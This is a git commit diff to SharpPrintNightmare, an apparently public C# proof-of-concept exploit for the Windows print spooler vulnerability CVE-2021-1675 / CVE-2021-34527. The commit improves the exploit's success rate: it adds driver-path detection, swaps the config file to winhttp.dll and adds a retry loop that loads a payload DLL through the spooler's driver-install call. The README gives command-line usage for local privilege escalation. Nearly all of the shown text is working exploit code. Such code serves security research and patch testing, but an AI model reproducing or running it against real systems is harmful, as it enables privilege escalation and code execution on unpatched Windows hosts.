C# success rate and PoC improvement

Signed-off-by: cube0x0 <vidfelt@protonmail.com>
2025-05-06 10:43:33 +01:00 · 2021-07-03 13:53:46 +02:00 · 2021-07-03 13:53:46 +02:00 · 2180daa238
commit 2180daa238
parent c6bb4923d8
6 changed files with 51 additions and 37 deletions
--- a/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
+++ b/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
--- a/SharpPrintNightmare/README.md
+++ b/SharpPrintNightmare/README.md
@ -1,7 +1,9 @@
-# C# Implementation of CVE-2021-1675
+# C# Implementation of CVE-2021-1675 / CVE-2021-34527

 ### Usage

+The RCE functionality might need to be executed with local administrator privileges on YOUR machine.
+
 ```
 #LPE
 C:\SharpPrintNightmare.exe C:\addCube.dll
--- a/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
+++ b/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
--- a/SharpPrintNightmare/SharpPrintNightmare/Program.cs
+++ b/SharpPrintNightmare/SharpPrintNightmare/Program.cs
@ -82,13 +82,17 @@ namespace SharpPrintNightmare
                        break;
                    }
                }
-                //lucky shot
+                //could not find driver path
                if (pDriverPath == "")
                {
-                    pDriverPath = drivers[0].pDriverPath;
+                    Console.WriteLine($"[-] [-] pDriverPath {pDriverPath}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....");
+                    Console.WriteLine($"[-] Specify pDriverPath manually");
+                    Environment.Exit(1);
                }
-                pDriverPath = Directory.GetParent(pDriverPath).FullName + "\\UNIDRV.DLL";
            }
+            Console.WriteLine($"[*] pDriverPath {pDriverPath}");
+            Console.WriteLine($"[*] Executing {dllpath}");
+
            if (args.Length > 2)
            {
                path = args[2];
@ -117,13 +121,11 @@ namespace SharpPrintNightmare

            //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
            //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
-            Console.WriteLine($"[*] pDriverPath {pDriverPath}");
-            Console.WriteLine($"[*] Executing {dllpath}");

            //DRIVER_INFO_2 Level2 = drivers[0]; // debug
            DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
            Level2.cVersion = 3;
-            Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
+            Level2.pConfigFile = "C:\\Windows\\System32\\winhttp.dll"; //replace kernelbase with winhttp
            Level2.pDataFile = dllpath;
            Level2.pDriverPath = pDriverPath;
            Level2.pEnvironment = "Windows x64";
@ -141,6 +143,8 @@ namespace SharpPrintNightmare
            Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error());
            Marshal.FreeHGlobal(pnt);

+            //Specify a dll that does not exists in C:\\Windows\\System32\\spool\\drivers\\x64\\3\\
+            Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
            for (int i = 1; i <= 30; i++)
            {
                //add path to our exploit